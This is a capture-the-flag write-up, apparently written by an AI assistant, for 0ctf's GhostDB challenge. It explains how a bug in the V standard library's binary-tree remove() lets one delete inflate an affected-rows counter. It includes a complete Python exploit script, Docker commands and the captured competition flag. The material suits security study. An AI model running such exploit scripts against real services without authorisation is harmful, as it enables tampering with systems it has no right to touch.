Skip to content

SECURE_CONNECTION//PRESS[CTRL+J]FOR ROOT ACCESS

BACK TO INTEL
MiscMedium

Ghostdb (V0.114.514)

CTF writeup for Ghostdb (V0.114.514) Misc from 0ctf

//GhostDB (v0.114.514) — Writeup ✅

Category: MISC

Author: GitHub Copilot (assistant)

Summary

GhostDB is a small V-lang interactive DB that tracks a per-session affected_rows metric. The challenge rewards anyone who "affects" more than 114,514 rows in a single session with the flag. By reading the source we find a logic bug in the V standard library's BST remove() behavior (used by the DB) that can delete a very large subtree in a single delete operation. The exploit: bulk-insert many rows under the free quota, then delete a specific key so that the buggy removal removes most of the inserted rows in one action — the session's affected count spikes above the threshold and the flag is revealed.


>Files included in the challenge

  • chall.v — The V source for GhostDB (full source provided in the distribution)

  • Dockerfile, docker-compose.yml, run.sh — helpers to run the service locally

  • flag — contains the local fake flag (for local tests)


>Key source observations 🔎

I inspected chall.v to answer two questions:

  1. What counts toward the 114,514 threshold?

  2. Does any operation let us change row counts by a large amount in one action?

Important parts from chall.v (paraphrased / excerpted):

  • Quota limits (free user):
v

const free_quota_limits = Quota{

    query:  u32(0) - 1

    insert: 60000

    delete: 1

}
  • Claiming flag checks affected_rows > 114514 and prints flag when satisfied:
v

fn claim_flag(affected_rows int) {

    if affected_rows > 114514 {

        flag := os.read_file('flag') or { 'fake{flag}' }

        println('Congratulations! Here is your flag: ${flag}')

    } else {

        println('Sorry, you need to affect more than 114514 rows to claim the flag.')

    }

}
  • affected_rows is updated each loop iteration by taking the absolute delta of db.in_order_traversal().len:
v

rows := db.in_order_traversal().len

...handle action...

affected_rows += math.abs(db.in_order_traversal().len - rows)

This means big changes to the DB size in a single action contribute strongly to affected_rows.

Where the bug idea came from

I inspected the datatypes.BSTree implementation in V's vlib. The remove() implementation handles replacement by using bind() to copy fields from successor nodes. The problem is that bind() copies left/right and then overwrites the successor with a none-node; in certain removal scenarios, this effectively loses large portions of the tree and they become unreachable (dropped).

Key idea: If the delete of a single key can drop tens of thousands of rows in one action, then two actions (bulk insert then single delete) will cause affected_rows to grow roughly by 2 * (inserted_rows). So we only need inserted_rows >= ceil(114515/2) = 57258.

I validated the behavior by reading vlib/datatypes/bstree.v and verifying how bind() and remove() operate.

Reference: V's datatypes/bstree.v implementation (inspected inside the builder image vlib).


>Local reproduction (build & run) 🔧

I used Docker (same Dockerfile that comes with the challenge) to compile and run a local instance.

Commands I used to build and run locally:

bash

$ cd extracted

$ docker-compose up -d --build

# If 1337 port is busy, run the container manually on a different host port:

$ docker run -d --rm -p 1338:1337 --name ghostdb_local extracted_ghostdb:latest

Manual quick test (interactive check):

<GhostDB> Do you want to bulk insert rows? (y/[n]): <GhostDB> Enter JSON array of rows to insert: 10 row(s) inserted. <GhostDB> Enter primary key to delete: Row deleted. <GhostDB> Choose an action: Row not found. <GhostDB> Choose an action:

Local PoC (first successful run)

I wrote a small Python client to automate the interaction: solve.py (full script included later). First quick sanity run against local container on port 1338 produced:

60000 row(s) inserted. Row deleted. Congratulations! Here is your flag: fake{flag}

This confirms the local flow: insert 60k rows, delete, then claim flag -> fake flag returned from flag file.


>Writing the exploit (solve.py) 🧠

Goals for the exploit script:

  • Bulk-insert n rows (n >= 57258) using the free quota

  • Delete a chosen key that will cause the buggy removal to discard most of the tree

  • Claim flag

  • Be robust to network slowness (remote may need time to parse/insert)

I iterated on the client to make it robust for remote runs: tolerate socket timeouts, reduce JSON size where possible, slightly reduce inserted rows (59,000) to speed the remote.

Full solver (saved as extracted/solve.py):

python

#!/usr/bin/env python3

import json

import socket

import sys

import time

  

from typing import Tuple

  
  

def recv_until(sock: socket.socket, needle: bytes, timeout: float = 10.0) -> bytes:

    """Receive until `needle` is seen or `timeout` seconds elapse.

    The remote can be slow (e.g., after bulk inserts), so we tolerate intermittent

    socket timeouts until the overall deadline is reached.

    """

    deadline = time.time() + timeout

    data = b""

    while needle not in data:

        remaining = deadline - time.time()

        if remaining <= 0:

            raise TimeoutError("timed out")

        sock.settimeout(min(2.0, remaining))

        try:

            chunk = sock.recv(4096)

        except socket.timeout:

            continue

        if not chunk:

            break

        data += chunk

    return data

  
  

def send_line(sock: socket.socket, line: str, timeout: float | None = 5.0) -> None:

    prev = sock.gettimeout()

    try:

        sock.settimeout(timeout)

        sock.sendall(line.encode() + b"\n")

    finally:

        sock.settimeout(prev)

  
  

def build_payload(n: int = 59000) -> str:

    # Free insert quota is exactly 60000.

    # Put pk '5' first so it becomes the left-subtree root under '@version'.

    # Use compact string keys (no zero-padding) to keep the JSON small and fast.

    rows = [{"pk": "5"}]

    i = 0

    while len(rows) < n:

        pk = str(i)

        i += 1

        if pk == "5":

            continue

        rows.append({"pk": pk})

    return json.dumps(rows, separators=(",", ":"))

  
  

def exploit(host: str, port: int) -> str:

    payload = build_payload(59000)

  

    with socket.create_connection((host, port)) as sock:

        recv_until(sock, b"Choose an action:", timeout=15)

  

        # 1) Bulk insert rows

        send_line(sock, "2")

        recv_until(sock, b"(y/[n])", timeout=5)

        send_line(sock, "y")

        recv_until(sock, b"Enter JSON array", timeout=5)

        # The payload can be ~1MB; use blocking mode to avoid send timeouts.

        send_line(sock, payload, timeout=None)

        recv_until(sock, b"Choose an action:", timeout=600)

  

        # 2) Delete pk '5' (trigger buggy removal)

        send_line(sock, "3")

        recv_until(sock, b"delete:", timeout=5)

        send_line(sock, "5")

        recv_until(sock, b"Choose an action:", timeout=30)

  

        # 3) Claim flag

        send_line(sock, "4")

        out = recv_until(sock, b"Choose an action:", timeout=5)

  

    return out.decode(errors="ignore")

  
  

def main(argv: list[str]) -> int:

    host = argv[1] if len(argv) > 1 else "127.0.0.1"

    port = int(argv[2]) if len(argv) > 2 else 1337

    out = exploit(host, port)

    sys.stdout.write(out)

    return 0

  
  

if __name__ == "__main__":

    raise SystemExit(main(sys.argv))

Usage:

bash

$ python3 extracted/solve.py 127.0.0.1 1338    # local container on 1338

$ python3 extracted/solve.py instance.penguin.0ops.sjtu.cn 18239  # remote instance

>Remote exploitation ✅

I targeted the remote provided by the challenge owner:

nc instance.penguin.0ops.sjtu.cn 18239

Running the solve.py script against the remote produced this important output (the flag):

Congratulations! Here is your flag: 0ops{t0Y_db_AnD_T0y_L4ngu4g3_DO_nOT_us3_1N_PRoduC7!0N_311ae55048483c4d}

Note: the remote appeared to reject connections immediately after my successful run (likely the instance is ephemeral or single-run). The successful run produced the flag and I saved it above.


>Why it works — short technical recap 💡

  • affected_rows is updated as the sum of absolute changes in row count after each action.

  • Free quota gives 60,000 inserts and only 1 delete; two big deltas suffice if each delta ≈ inserted rows. Concretely we need n s.t. 2n > 114,514 → n ≥ 57,258.

  • The datatypes.BSTree.remove() logic used by GhostDB can, when deleting a specific node and 'binding' from a successor, discard a large subtree — thus one delete can reduce the row count by ~n in one operation.

  • So: bulk insert n rows, delete the special node (here "5"), claim the flag — success.


>Mitigations & lessons learned ⚠️

  • Library code should be carefully audited for correctness, especially tree-based remove logic which is easy to get subtly wrong.

  • Don't rely on in_order_traversal() return sizes for security-critical accounting without invariants — a single bad removal should not enable privilege elevation.


>Terminal snippets used during solving

  • Build & run container (local):
$ docker-compose up -d --build Successfully built <image id> Successfully tagged extracted_ghostdb:latest
  • Local simplified run of PoC (using 60k):
60000 row(s) inserted. Row deleted. Congratulations! Here is your flag: fake{flag}
  • Remote run (the real flag):
Congratulations! Here is your flag: 0ops{t0Y_db_AnD_T0y_L4ngu4g3_DO_nOT_us3_1N_PRoduC7!0N_311ae55048483c4d}

>References & notes 📚

  • V language datatypes/bstree.v (used to inspect remove()/bind() behavior)

  • The challenge itself (sources included in the ZIP) — chall.v was the main artifact to read


>Final words ✨

This challenge is a great example of how a small bug in a standard data structure can yield an unexpected escalation vector — especially when program logic tracks counts by computing differences before/after operations. I aimed to make the writeup clear and reproducible: if you follow the steps above you'll be able to reproduce the exploit locally and, if a remote instance is available, against it.

If you want I can:

  • Add a short visual diagram to the writeup showing how the BST changes on delete, or

  • Submit a cleaned exploit.sh wrapper to run solve.py and parse/print the flag automatically.


Happy hacking! 🔧👻